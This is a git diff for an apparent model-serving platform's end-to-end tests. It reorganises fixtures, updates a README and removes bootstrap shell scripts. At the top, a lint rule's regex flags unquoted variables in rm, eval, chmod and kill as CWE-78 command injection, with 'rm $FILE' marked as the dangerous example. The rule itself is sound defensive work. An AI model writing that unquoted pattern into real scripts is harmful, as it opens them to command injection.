+        rm "$FILE"         # correct
+        rm $FILE           # dangerous
+    pattern-regex: '(rm|cp|mv|eval|chmod|chown|kill|pkill)\s+[^|;]*(?<!["''\\])\$(?:\{[A-Za-z_][A-Za-z0-9_]*(?:[:\-\+\?=][^}]*)?\}|[A-Za-z_][A-Za-z0-9_]*)'
+    metadata:
+      cwe: "CWE-78"
+      category: "security"
diff --git a/test/.gitignore b/test/.gitignore
new file mode 100644
index 000000000..9603c47f5
--- /dev/null
+++ b/test/.gitignore
@@ -0,0 +1,3 @@
+# Test run artifacts — keep directories, ignore contents
+**/artifacts/*
+!**/artifacts/.gitkeep
diff --git a/test/e2e/.gitignore b/test/e2e/.gitignore
deleted file mode 100644
index 1e6a342c3..000000000
--- a/test/e2e/.gitignore
+++ /dev/null
@@ -1,13 +0,0 @@
-# Python caches / local env
-__pycache__/
-.pytest_cache/
-.venv/
-.env
-
-# e2e run artifacts
-reports/
-*.log
-
-# editor/OS cruft
-.vscode/
-.DS_Store
diff --git a/test/e2e/README.md b/test/e2e/README.md
index ffbd6510b..bba34d87b 100644
--- a/test/e2e/README.md
+++ b/test/e2e/README.md
@@ -59,31 +59,94 @@ Tests for the API Key Management endpoints (`/v1/api-keys`):
 
 ```bash
 cd test/e2e
-./run_api_key_tests.sh
+python3 -m venv .venv
+source .venv/bin/activate
+pip install -r requirements.txt
+
+export GATEWAY_HOST="maas.apps.your-cluster.example.com"
+# Or: export MAAS_API_BASE_URL="https://maas.apps.your-cluster.example.com/maas-api"
+
+# Ensure that you are logged into your openshift cluster prior to execution
+# export E2E_SKIP_TLS_VERIFY=true # Disables TLS verification
+pytest tests/test_api_keys.py -v \
+    --html=reports/api-keys-report.html --self-contained-html
 ```
 
 **Environment Variables:**
 - `MAAS_API_BASE_URL` - MaaS API URL (auto-discovered from `oc get route maas-api`)
 - `TOKEN` - User token (auto-obtained via `oc whoami -t`)
 - `ADMIN_OC_TOKEN` - Optional admin token for authorization tests (if not set, admin tests are skipped)
+- `API_KEY_MAX_EXPIRATION_DAYS` - Max expiration policy for expiration tests (default: 90, matching maas-api default)
 
 **Test Coverage:**
-- ✅ Create, list, revoke API keys
+- ✅ Create, search, revoke API keys
 - ✅ Admin authorization (manage other users' keys)
 - ✅ Non-admin authorization (403 on other users' keys)
 - ✅ Validation endpoint (active and revoked keys)
 
 Results: `test/e2e/reports/api-keys-report.html`
 
+### Models Endpoint Tests
+
+Tests for the `/v1/models` endpoint that validate subscription-aware model filtering:
+
+```bash
+cd test/e2e
+source .venv/bin/activate
+
+# Run all /v1/models tests
+pytest tests/test_models_endpoint.py -v
+
+# Run specific test scenarios
+pytest tests/test_models_endpoint.py::TestModelsEndpoint::test_single_subscription_auto_select -v
+pytest tests/test_models_endpoint.py::TestModelsEndpoint::test_multi_subscription_without_header_403 -v
+```
+
+**Test Coverage (15 tests):**
+
+*Success Cases (HTTP 200) - 11 tests:*
+- ✅ Single subscription auto-select (no header required)
+- ✅ Explicit subscription header with multiple subscriptions
+- ✅ Empty subscription header value behavior
+- ✅ Subscription header case insensitivity (HTTP standard)
+- ✅ Models correctly filtered by subscription
+- ⚠️  Same modelRef listed twice should deduplicate (xfail - returns 2+ duplicates instead of 1)
+- ⚠️  Different modelRefs serving SAME model ID should deduplicate (xfail - returns 3+ duplicates instead of 1)
+- ✅ Different modelRefs with different IDs returns 2 entries (uses non-duplicating simulators)
+- ⚠️  Empty model list returns [] not null (xfail - currently returns null)
+- ✅ Response schema matches OpenAPI specification
+- ✅ Model metadata (url, ready, created, owned_by) preserved
+
+*Error Cases (HTTP 403) - 3 tests:*
+- ✅ Multiple subscriptions without header → 403 permission_error
+- ✅ Invalid subscription header → 403 permission_error
+- ✅ Access denied to subscription → 403 permission_error
+
+*Error Cases (HTTP 401) - 1 test:*
+- ✅ Unauthenticated request → 401 authentication_error
+
+**What's Being Validated:**
+The `/v1/models` endpoint implements subscription-aware model filtering:
+- With a **user token**, a single matching subscription can be auto-selected; with multiple subscriptions, the tests expect `X-MaaS-Subscription` when the platform cannot disambiguate.
+- With an **API key**, the subscription is fixed at mint time—listing does not rely on sending `X-MaaS-Subscription` for that case.
+- Returns proper error responses (403/401) with `permission_error`/`authentication_error` types
+- Models are correctly filtered to only show those from the specified subscription
+- Response structure matches OpenAPI schema: `{"object": "list", "data": [...]}`
+- HTTP header handling follows standards (case-insensitive)
+- Model metadata is accurately preserved from source
+
 ## CI Integration
 
 These tests run automatically in CI via:
-- **Prow**: `./test/e2e/scripts/prow_run_smoke_test.sh` (includes subscription tests)
+- **Prow**: `./test/e2e/scripts/prow_run_smoke_test.sh` (includes all E2E tests)
 - **GitHub Actions**: Can be integrated into `.github/workflows/` as needed
 
 The `prow_run_smoke_test.sh` script:
 1. Deploys MaaS platform and dependencies
 2. Deploys test models (free + premium simulators)
-3. Runs subscription controller tests (`test_subscription.py`)
+3. Runs E2E tests:
+   - API key management (`test_api_keys.py`)
+   - Subscription controller (`test_subscription.py`)
+   - Models endpoint (`test_models_endpoint.py`)
 4. Runs deployment validation and token metadata verification
 5. Collects artifacts (HTML/XML reports, logs) to `ARTIFACT_DIR`
diff --git a/test/e2e/bootstrap.sh b/test/e2e/bootstrap.sh
deleted file mode 100644
index 770d6fc4b..000000000
--- a/test/e2e/bootstrap.sh
+++ /dev/null
@@ -1,225 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-trap 'echo "[bootstrap] ERROR line $LINENO: $BASH_COMMAND" >&2' ERR
-
-# Repo/E2E dirs
-REPO_ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)"
-E2E_DIR="${REPO_ROOT}/test/e2e"
-
-# Defaults (overridable via env)
-NS="${NS:-llm}"
-MODEL_PATH="${MODEL_PATH:-docs/samples/models/facebook-opt-125m-cpu}"
-GATEWAY_NAME="${GATEWAY_NAME:-maas-default-gateway}"
-GATEWAY_NS="${GATEWAY_NS:-openshift-ingress}"
-WRITE_ENV="${WRITE_ENV:-true}"     # write test/e2e/.env
-SKIP_DEPLOY="${SKIP_DEPLOY:-true}" # default true (don’t redeploy model unless you want to)
-
-echo "[bootstrap] oc whoami: $(oc whoami || true)"
-echo "[bootstrap] NS=${NS} MODEL_PATH=${MODEL_PATH} SKIP_DEPLOY=${SKIP_DEPLOY}"
-
-command -v oc >/dev/null 2>&1 || { echo "oc missing"; exit 1; }
-command -v jq >/dev/null 2>&1 || { echo "jq missing"; exit 1; }
-command -v kustomize >/dev/null 2>&1 || { echo "kustomize missing"; exit 1; }
-
-# ---- Detect model CR name from kustomize
-if command -v yq >/dev/null 2>&1; then
-  DEDUCED_CR="$(kustomize build "${MODEL_PATH}" | yq -r 'select(.kind=="LLMInferenceService") | .metadata.name' | head -n1)"
-else
-  DEDUCED_CR="$(kustomize build "${MODEL_PATH}" | awk '/^kind: LLMInferenceService$/{f=1} f&&/^  name:/{print $2; exit}')"
-fi
-if [[ -z "${DEDUCED_CR:-}" ]]; then
-  echo "[bootstrap] Could not detect LLMInferenceService name from ${MODEL_PATH}" >&2
-  exit 1
-fi
-export MODEL_NAME="${MODEL_NAME:-$DEDUCED_CR}"
-echo "[bootstrap] Using kind=llminferenceservice ns=${NS} (${MODEL_PATH##*/})"
-echo "[bootstrap] Model CR name: ${MODEL_NAME}"
-
-# ---- Deploy PostgreSQL for API key storage (required for E2E tests)
-MAAS_NS="${MAAS_NS:-opendatahub}"
-echo "[bootstrap] Checking PostgreSQL in namespace: ${MAAS_NS}"
-if ! kubectl get deployment postgres -n "${MAAS_NS}" &>/dev/null; then
-  echo "[bootstrap] PostgreSQL not found, deploying..."
-
-  POSTGRES_USER="${POSTGRES_USER:-maas}"
-  POSTGRES_DB="${POSTGRES_DB:-maas}"
-
-  # Generate random password if not provided
-  POSTGRES_PASSWORD="${POSTGRES_PASSWORD:-}"
-  if [[ -z "${POSTGRES_PASSWORD}" ]]; then
-    POSTGRES_PASSWORD="$(openssl rand -base64 32 | tr -d '/+=' | cut -c1-32)"
-    echo "[bootstrap] Generated random PostgreSQL password (stored in secret postgres-creds)"
-  fi
-
-  kubectl apply -n "${MAAS_NS}" -f - <<EOF
-apiVersion: v1
-kind: Secret
-metadata:
-  name: postgres-creds
-  labels:
-    app: postgres
-    purpose: e2e-test
-stringData:
-  POSTGRES_USER: "${POSTGRES_USER}"
-  POSTGRES_PASSWORD: "${POSTGRES_PASSWORD}"
-  POSTGRES_DB: "${POSTGRES_DB}"
----
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: postgres
-  labels:
-    app: postgres
-    purpose: e2e-test
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: postgres
-  template:
-    metadata:
-      labels:
-        app: postgres
-    spec:
-      containers:
-      - name: postgres
-        image: registry.redhat.io/rhel9/postgresql-15:latest
-        env:
-        - name: POSTGRESQL_USER
-          valueFrom:
-            secretKeyRef:
-              name: postgres-creds
-              key: POSTGRES_USER
-        - name: POSTGRESQL_PASSWORD
-          valueFrom:
-            secretKeyRef:
-              name: postgres-creds
-              key: POSTGRES_PASSWORD
-        - name: POSTGRESQL_DATABASE
-          valueFrom:
-            secretKeyRef:
-              name: postgres-creds
-              key: POSTGRES_DB
-        ports:
-        - containerPort: 5432
-        volumeMounts:
-        - name: data
-          mountPath: /var/lib/pgsql/data
-        resources:
-          requests:
-            memory: "256Mi"
-            cpu: "100m"
-          limits:
-            memory: "512Mi"
-            cpu: "500m"
-        readinessProbe:
-          exec:
-            command: ["/usr/libexec/check-container"]
-          initialDelaySeconds: 5
-          periodSeconds: 5
-      volumes:
-      - name: data
-        emptyDir: {}
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: postgres
-  labels:
-    app: postgres
-    purpose: e2e-test
-spec:
-  selector:
-    app: postgres
-  ports:
-  - port: 5432
-    targetPort: 5432
----
-apiVersion: v1
-kind: Secret
-metadata:
-  name: maas-db-config
-  labels:
-    app: maas-api
-    purpose: e2e-test
-stringData:
-  DB_CONNECTION_URL: "postgresql://${POSTGRES_USER}:${POSTGRES_PASSWORD}@postgres:5432/${POSTGRES_DB}?sslmode=disable"
-EOF
-
-  echo "[bootstrap] Waiting for PostgreSQL to be ready..."
-  kubectl wait -n "${MAAS_NS}" --for=condition=available deployment/postgres --timeout=120s || {
-    echo "[bootstrap] WARNING: PostgreSQL deployment failed, E2E tests may fail"
-  }
-  echo "[bootstrap] PostgreSQL deployed successfully"
-else
-  echo "[bootstrap] PostgreSQL already deployed in ${MAAS_NS}"
-fi
-
-# ---- (Optional) deploy/redeploy the model
-if [[ "${SKIP_DEPLOY}" != "true" ]]; then
-  oc get ns "${NS}" >/dev/null 2>&1 || oc create ns "${NS}"
-  echo "[bootstrap] Applying from: ${MODEL_PATH}/"
-  kustomize build "${MODEL_PATH}" | kubectl apply -f -
-  echo "[bootstrap] Waiting for llminferenceservice/${MODEL_NAME} to be Ready (timeout 15m)…"
-  oc -n "${NS}" wait --for=condition=Ready "llminferenceservice/${MODEL_NAME}" --timeout=15m
-else
-  echo "[bootstrap] Skipping model deployment (SKIP_DEPLOY=${SKIP_DEPLOY})"
-fi
-
-# ---- Discover gateway host and MaaS API URL
-HOST="${HOST:-}"
-if [[ -z "${HOST}" ]]; then
-  HOST="$(oc -n "${GATEWAY_NS}" get gateway "${GATEWAY_NAME}" -o jsonpath='{.status.addresses[0].value}' 2>/dev/null || true)"
-fi
-if [[ -z "${HOST}" ]]; then
-  # Fallback to cluster apps domain
-  APPS="$(oc get ingresses.config/cluster -o jsonpath='{.spec.domain}' 2>/dev/null || oc get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}' 2>/dev/null || true)"
-  HOST="gateway.${APPS}"
-fi
-if [[ -z "${HOST}" ]]; then
-  echo "[bootstrap] ERROR: could not determine HOST" >&2
-  exit 1
-fi
-
-# Prefer https if healthz responds; otherwise http
-SCHEME="https"
-if ! curl -skS -m 5 "${SCHEME}://${HOST}/maas-api/healthz" -o /dev/null ; then
-  SCHEME="http"
-fi
-
-export HOST
-export MAAS_API_BASE_URL="${SCHEME}://${HOST}/maas-api"
-
-# Try to discover model base URL via catalog (nice-to-have)
-FREE_OC_TOKEN="$(oc whoami -t || true)"
-MODEL_URL_DISC=""
-if [[ -n "${FREE_OC_TOKEN}" ]]; then
-  # Note: /v1/tokens endpoint was removed, now use OC token directly for management APIs
-  MODELS_JSON="$(curl -sSk -H "Authorization: Bearer ${FREE_OC_TOKEN}" "${MAAS_API_BASE_URL}/v1/models" || true)"
-  MODEL_URL_DISC="$(echo "${MODELS_JSON}" | jq -r '(.data // .models // [])[0]?.url // empty' 2>/dev/null || true)"
-fi
-
-# Compose model URL if catalog didn’t give us one
-if [[ -z "${MODEL_URL_DISC}" ]]; then
-  MODEL_URL_DISC="${SCHEME}://${HOST}/llm/${MODEL_NAME}"
-fi
-MODEL_URL="${MODEL_URL_DISC%/}/v1"
-
-echo "[bootstrap] MAAS_API_BASE_URL=${MAAS_API_BASE_URL}"
-echo "[bootstrap] MODEL_URL=${MODEL_URL}"
-
-# ---- Write .env for convenience
-if [[ "${WRITE_ENV}" == "true" ]]; then
-  mkdir -p "${E2E_DIR}"
-  cat > "${E2E_DIR}/.env" <<EOF
-export HOST="${HOST}"
-export MAAS_API_BASE_URL="${MAAS_API_BASE_URL}"
-export FREE_OC_TOKEN="$(oc whoami -t || true)"
-export MODEL_NAME="${MODEL_NAME}"
-export MODEL_URL="${MODEL_URL}"
-export ROUTER_MODE="gw"  # informational only
-EOF
-  echo "[bootstrap] wrote ${E2E_DIR}/.env"
-fi
-
-echo "[bootstrap] Done."
diff --git a/test/e2e/fixtures/README.md b/test/e2e/fixtures/README.md
new file mode 100644
index 000000000..a8146236c
--- /dev/null
+++ b/test/e2e/fixtures/README.md
@@ -0,0 +1,36 @@
+# E2E Test Fixtures
+
+This directory contains kustomizations for end-to-end testing that combine public samples with test-only fixtures.
+
+## Contents
+
+### Public Samples (from `docs/samples/maas-system/`)
+- **free**: `system:authenticated` group, 100 tokens/min
+- **premium**: `premium-user` group, 1000 tokens/min
+
+### Test-Only Fixtures
+- **unconfigured**: Model with no MaaSAuthPolicy or MaaSSubscription (validates that gateway denies access with 403)
+- **distinct**: First distinct model serving `test/e2e-distinct-model` (validates multiple distinct models in subscriptions)
+- **distinct-2**: Second distinct model serving `test/e2e-distinct-model-2` (validates multiple distinct models in subscriptions)
+
+## Usage
+
+### For E2E Tests (CI)
+
+```bash
+# Deploy all fixtures (public samples + test-only)
+kustomize build test/e2e/fixtures | kubectl apply -f -
+```
+
+### For Manual Testing
+
+To deploy only the public samples without test fixtures, use:
+
+```bash
+# Public samples only (free + premium)
+kustomize build docs/samples/maas-system | kubectl apply -f -
+```
+
+## Note
+
+⚠️ **Do not use this kustomization for production or sample installations.** It includes test-only models that are designed to validate edge cases and should not be deployed in normal usage scenarios. For sample installations, use `docs/samples/maas-system/` instead.
diff --git a/test/e2e/fixtures/distinct-2/kustomization.yaml b/test/e2e/fixtures/distinct-2/kustomization.yaml
new file mode 100644
index 000000000..b19766004
--- /dev/null
+++ b/test/e2e/fixtures/distinct-2/kustomization.yaml
@@ -0,0 +1,6 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - llm
+  - maas
diff --git a/test/e2e/fixtures/distinct-2/llm/kustomization.yaml b/test/e2e/fixtures/distinct-2/llm/kustomization.yaml
new file mode 100644
index 000000000..e1b32ea69
--- /dev/null
+++ b/test/e2e/fixtures/distinct-2/llm/kustomization.yaml
@@ -0,0 +1,5 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - ../../../../../docs/samples/models/e2e-distinct-2-simulated
diff --git a/docs/samples/maas-system/unconfigured/maas/kustomization.yaml b/test/e2e/fixtures/distinct-2/maas/kustomization.yaml
similarity index 100%
rename from docs/samples/maas-system/unconfigured/maas/kustomization.yaml
rename to test/e2e/fixtures/distinct-2/maas/kustomization.yaml
diff --git a/test/e2e/fixtures/distinct-2/maas/maas-model.yaml b/test/e2e/fixtures/distinct-2/maas/maas-model.yaml
new file mode 100644
index 000000000..57001e951
--- /dev/null
+++ b/test/e2e/fixtures/distinct-2/maas/maas-model.yaml
@@ -0,0 +1,13 @@
+# MaaSModelRef for the second distinct-tier simulator.
+# Used by e2e tests to validate multiple distinct models in a subscription.
+# LLMIS from docs/samples/models/e2e-distinct-2-simulated (name: e2e-distinct-2-simulated in namespace llm).
+# Serves model ID: test/e2e-distinct-model-2 (different from all other test models)
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: e2e-distinct-2-simulated
+  namespace: llm
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: e2e-distinct-2-simulated
diff --git a/test/e2e/fixtures/distinct/kustomization.yaml b/test/e2e/fixtures/distinct/kustomization.yaml
new file mode 100644
index 000000000..b19766004
--- /dev/null
+++ b/test/e2e/fixtures/distinct/kustomization.yaml
@@ -0,0 +1,6 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - llm
+  - maas
diff --git a/test/e2e/fixtures/distinct/llm/kustomization.yaml b/test/e2e/fixtures/distinct/llm/kustomization.yaml
new file mode 100644
index 000000000..327c27e30
--- /dev/null
+++ b/test/e2e/fixtures/distinct/llm/kustomization.yaml
@@ -0,0 +1,5 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - ../../../../../docs/samples/models/e2e-distinct-simulated
diff --git a/test/e2e/fixtures/distinct/maas/kustomization.yaml b/test/e2e/fixtures/distinct/maas/kustomization.yaml
new file mode 100644
index 000000000..6497285bc
--- /dev/null
+++ b/test/e2e/fixtures/distinct/maas/kustomization.yaml
@@ -0,0 +1,5 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - maas-model.yaml
diff --git a/test/e2e/fixtures/distinct/maas/maas-model.yaml b/test/e2e/fixtures/distinct/maas/maas-model.yaml
new file mode 100644
index 000000000..2763c9231
--- /dev/null
+++ b/test/e2e/fixtures/distinct/maas/maas-model.yaml
@@ -0,0 +1,13 @@
+# MaaSModelRef for the distinct-tier simulator.
+# Used by e2e tests to validate multiple distinct models in a subscription.
+# LLMIS from docs/samples/models/e2e-distinct-simulated (name: e2e-distinct-simulated in namespace llm).
+# Serves model ID: test/e2e-distinct-model (different from facebook/opt-125m)
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: e2e-distinct-simulated
+  namespace: llm
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: e2e-distinct-simulated
diff --git a/test/e2e/fixtures/kustomization.yaml b/test/e2e/fixtures/kustomization.yaml
new file mode 100644
index 000000000..0c91a2dc7
--- /dev/null
+++ b/test/e2e/fixtures/kustomization.yaml
@@ -0,0 +1,15 @@
+# E2E Test Fixtures Kustomization
+# Combines public samples (free, premium) with e2e-only test fixtures
+# (unconfigured, distinct, distinct-2) for comprehensive testing.
+# Use this for CI/e2e tests instead of the public samples kustomization.
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  # Public samples (free + premium tiers)
+  - ../../../docs/samples/maas-system/free
+  - ../../../docs/samples/maas-system/premium
+  # E2E-only test fixtures
+  - unconfigured  # No auth/subscription (validates 403)
+  - distinct      # Distinct model ID (validates multiple distinct models)
+  - distinct-2    # Second distinct model ID (validates multiple distinct models)
diff --git a/docs/samples/maas-system/unconfigured/kustomization.yaml b/test/e2e/fixtures/unconfigured/kustomization.yaml
similarity index 100%
rename from docs/samples/maas-system/unconfigured/kustomization.yaml
rename to test/e2e/fixtures/unconfigured/kustomization.yaml
diff --git a/docs/samples/maas-system/unconfigured/llm/kustomization.yaml b/test/e2e/fixtures/unconfigured/llm/kustomization.yaml
similarity index 77%
rename from docs/samples/maas-system/unconfigured/llm/kustomization.yaml
rename to test/e2e/fixtures/unconfigured/llm/kustomization.yaml
index 9824f7cb9..f4e244549 100644
--- a/docs/samples/maas-system/unconfigured/llm/kustomization.yaml
+++ b/test/e2e/fixtures/unconfigured/llm/kustomization.yaml
@@ -9,4 +9,4 @@ namespace: llm
 namePrefix: e2e-unconfigured-
 
 resources:
-  - ../../../models/simulator
+  - ../../../../../docs/samples/models/simulator
diff --git a/test/e2e/fixtures/unconfigured/maas/kustomization.yaml b/test/e2e/fixtures/unconfigured/maas/kustomization.yaml
new file mode 100644
index 000000000..6497285bc
--- /dev/null
+++ b/test/e2e/fixtures/unconfigured/maas/kustomization.yaml
@@ -0,0 +1,5 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+
+resources:
+  - maas-model.yaml
diff --git a/docs/samples/maas-system/unconfigured/maas/maas-model.yaml b/test/e2e/fixtures/unconfigured/maas/maas-model.yaml
similarity index 66%
rename from docs/samples/maas-system/unconfigured/maas/maas-model.yaml
rename to test/e2e/fixtures/unconfigured/maas/maas-model.yaml
index fdc07dd8a..c88cc364e 100644
--- a/docs/samples/maas-system/unconfigured/maas/maas-model.yaml
+++ b/test/e2e/fixtures/unconfigured/maas/maas-model.yaml
@@ -5,6 +5,9 @@ kind: MaaSModelRef
 metadata:
   name: e2e-unconfigured-facebook-opt-125m-simulated
   namespace: llm
+  annotations:
+    openshift.io/display-name: "Unconfigured OPT 125M (E2E)"
+    openshift.io/description: "MaaSModelRef with no auth policy or subscription — used to validate default-deny"
 spec:
   modelRef:
     kind: LLMInferenceService
diff --git a/test/e2e/run-model-and-smoke.sh b/test/e2e/run-model-and-smoke.sh
deleted file mode 100644
index af5da1819..000000000
--- a/test/e2e/run-model-and-smoke.sh
+++ /dev/null
@@ -1,71 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-# -------- Config (overridable) --------
-NS="${NS:-llm}"
-MODEL_PATH="${MODEL_PATH:-docs/samples/models/facebook-opt-125m-cpu}"
-ARTIFACT_DIR="${ARTIFACT_DIR:-test/e2e/reports}"
-
-# -------- Inputs we require --------
-: "${MODEL_NAME:?Export MODEL_NAME (LLMInferenceService name)}"
-
-# One of these must be provided (we'll derive HOST/API if needed)
-CLUSTER_DOMAIN="${CLUSTER_DOMAIN:-}"
-HOST="${HOST:-}"
-MAAS_API_BASE_URL="${MAAS_API_BASE_URL:-}"
-
-echo "[e2e] NS=${NS}"
-echo "[e2e] MODEL_NAME=${MODEL_NAME}"
-echo "[e2e] MODEL_PATH=${MODEL_PATH}"
-
-command -v oc >/dev/null || { echo "oc missing"; exit 1; }
-command -v kustomize >/dev/null || { echo "kustomize missing"; exit 1; }
-
-# -------- Deploy model --------
-oc get ns "${NS}" >/dev/null 2>&1 || oc create ns "${NS}"
-echo "[e2e] Applying ${MODEL_PATH} to ns ${NS}"
-kustomize build "${MODEL_PATH}" | kubectl -n "${NS}" apply -f -
-echo "[e2e] Waiting for LLMInferenceService/${MODEL_NAME} Ready…"
-ISVC_NAME="${ISVC_NAME:-}"
-if [[ -z "${ISVC_NAME}" ]]; then
-  if command -v yq >/dev/null 2>&1; then
-    ISVC_NAME="$(kustomize build "${MODEL_PATH}" | yq -r 'select(.kind=="LLMInferenceService") | .metadata.name' | head -n1)"
-  else
-    ISVC_NAME="$(kustomize build "${MODEL_PATH}" | awk '/^kind: LLMInferenceService$/{f=1} f&&/^  name:/{print $2; exit}')"
-  fi
-fi
-oc -n "${NS}" wait --for=condition=Ready "llminferenceservice/${ISVC_NAME}" --timeout=15m
-
-# -------- Work out API base URL (simple rules) --------
-if [[ -z "${MAAS_API_BASE_URL}" ]]; then
-  if [[ -z "${HOST}" ]]; then
-    if [[ -z "${CLUSTER_DOMAIN}" ]]; then
-      echo "[e2e] ERROR: set MAAS_API_BASE_URL or HOST or CLUSTER_DOMAIN" >&2
-      exit 2
-    fi
-    HOST="maas.${CLUSTER_DOMAIN}"
-  fi
-  SCHEME="https"
-  if ! curl -skI -m 5 "${SCHEME}://${HOST}/maas-api/healthz" >/dev/null; then
-    SCHEME="http"
-  fi
-  MAAS_API_BASE_URL="${SCHEME}://${HOST}/maas-api"
-fi
-
-export HOST
-export MAAS_API_BASE_URL
-export MODEL_NAME
-
-echo "[e2e] HOST=${HOST}"
-echo "[e2e] MAAS_API_BASE_URL=${MAAS_API_BASE_URL}"
-
-# -------- Run smoke --------
-mkdir -p "${ARTIFACT_DIR}"
-echo "[e2e] Running smoke tests…"
-( cd test/e2e && bash ./smoke.sh )
-
-# Copy artifacts if a different dir was requested
-if [[ "test/e2e/reports" != "${ARTIFACT_DIR}" ]]; then
-  cp -r test/e2e/reports/. "${ARTIFACT_DIR}/"
-fi
-echo "[e2e] Done. Reports in ${ARTIFACT_DIR}"
diff --git a/test/e2e/run_api_key_tests.sh b/test/e2e/run_api_key_tests.sh
deleted file mode 100755
index 88435ab99..000000000
--- a/test/e2e/run_api_key_tests.sh
+++ /dev/null
@@ -1,75 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
-cd "$SCRIPT_DIR"
-
-echo "========================================"
-echo "  API Key Management E2E Tests"
-echo "========================================"
-
-# Activate virtual environment
-if [[ ! -d ".venv" ]]; then
-    echo "[setup] Virtual environment not found. Run bootstrap.sh first."
-    exit 1
-fi
-
-source .venv/bin/activate
-
-# Auto-discover MAAS_API_BASE_URL if not set
-if [[ -z "${MAAS_API_BASE_URL:-}" ]]; then
-    echo "[setup] MAAS_API_BASE_URL not set, attempting to discover from OpenShift route..."
-    ROUTE_HOST=$(oc get route maas-api -n maas-system -o jsonpath='{.spec.host}' 2>/dev/null || echo "")
-    if [[ -n "$ROUTE_HOST" ]]; then
-        export MAAS_API_BASE_URL="https://${ROUTE_HOST}/maas-api"
-        echo "[setup] Discovered MAAS_API_BASE_URL: $MAAS_API_BASE_URL"
-    else
-        echo "[ERROR] Could not discover MAAS_API_BASE_URL. Please set it manually:"
-        echo "  export MAAS_API_BASE_URL=https://your-maas-api-url/maas-api"
-        exit 1
-    fi
-fi
-
-# Auto-obtain token if not set
-if [[ -z "${TOKEN:-}" ]]; then
-    echo "[setup] TOKEN not set, obtaining via 'oc whoami -t'..."
-    export TOKEN=$(oc whoami -t 2>/dev/null || echo "")
-    if [[ -z "$TOKEN" ]]; then
-        echo "[ERROR] Could not obtain token. Please set it manually:"
-        echo "  export TOKEN=\$(oc whoami -t)"
-        exit 1
-    fi
-    echo "[setup] Obtained TOKEN (length: ${#TOKEN})"
-fi
-
-# Optional admin token for authorization tests
-if [[ -z "${ADMIN_OC_TOKEN:-}" ]]; then
-    echo "[setup] ADMIN_OC_TOKEN not set. Admin authorization tests will be skipped."
-    echo "[setup] To run admin tests, set: export ADMIN_OC_TOKEN=<admin-token>"
-else
-    echo "[setup] ADMIN_OC_TOKEN is set (length: ${#ADMIN_OC_TOKEN})"
-fi
-
-echo ""
-echo "[run] Environment:"
-echo "  MAAS_API_BASE_URL: $MAAS_API_BASE_URL"
-echo "  TOKEN: ${TOKEN:0:10}... (${#TOKEN} chars)"
-echo "  ADMIN_OC_TOKEN: ${ADMIN_OC_TOKEN:+SET}"
-echo ""
-
-# Create reports directory
-mkdir -p reports
-
-# Run the tests
-echo "[run] Running API Key tests with pytest..."
-pytest tests/test_api_keys.py -v \
-    --html=reports/api-keys-report.html \
-    --self-contained-html \
-    -o log_cli=true \
-    -o log_cli_level=INFO
-
-echo ""
-echo "========================================"
-echo "  Tests Complete!"
-echo "========================================"
-echo "Report: $SCRIPT_DIR/reports/api-keys-report.html"
diff --git a/test/e2e/scripts/auth_utils.sh b/test/e2e/scripts/auth_utils.sh
index 678a9f745..13cdb4609 100755
--- a/test/e2e/scripts/auth_utils.sh
+++ b/test/e2e/scripts/auth_utils.sh
@@ -203,8 +203,10 @@ run_auth_debug_report() {
 
   _section "maas-controller"
   _run "maas-controller pods" "kubectl get pods -n $DEPLOYMENT_NAMESPACE -l app=maas-controller -o wide 2>/dev/null || true"
-  _run "maas-controller MAAS_API_NAMESPACE" \
-    "kubectl get deployment maas-controller -n $DEPLOYMENT_NAMESPACE -o jsonpath='{.spec.template.spec.containers[0].env}' 2>/dev/null | jq -r '.[] | select(.name==\"MAAS_API_NAMESPACE\") | \"\(.name)=\(.value // .valueFrom.fieldRef.fieldPath // \"N/A\")\"' 2>/dev/null || echo 'N/A'"
+
+  local env_display
+  env_display=$(kubectl get deployment maas-controller -n $DEPLOYMENT_NAMESPACE -o jsonpath='{.spec.template.spec.containers[0].env}' 2>/dev/null | jq -r '.[] | select(.name=="MAAS_API_NAMESPACE") | if .value then "\(.name)=\(.value)" elif .valueFrom.fieldRef.fieldPath then "\(.name)=\(.valueFrom.fieldRef.fieldPath) (resolves to: '"$DEPLOYMENT_NAMESPACE"')" else "\(.name)=N/A" end' 2>/dev/null || echo 'MAAS_API_NAMESPACE=N/A')
+  _run "maas-controller MAAS_API_NAMESPACE" "echo '$env_display'"
   _append ""
 
   _section "Kuadrant AuthPolicies"
@@ -214,7 +216,78 @@ run_auth_debug_report() {
   _section "MaaS CRs"
   _run "MaaSAuthPolicies" "kubectl get maasauthpolicies -n $MAAS_SUBSCRIPTION_NAMESPACE -o wide 2>/dev/null || true"
   _run "MaaSSubscriptions" "kubectl get maassubscriptions -n $MAAS_SUBSCRIPTION_NAMESPACE -o wide 2>/dev/null || true"
-  _run "MaaSModelRefs" "kubectl get maasmodelrefs -n $DEPLOYMENT_NAMESPACE -o wide 2>/dev/null || true"
+  _run "MaaSModelRefs (all namespaces)" "kubectl get maasmodelrefs -A -o wide 2>/dev/null || true"
+  _append ""
+
+  _section "Test User Information"
+  local test_token
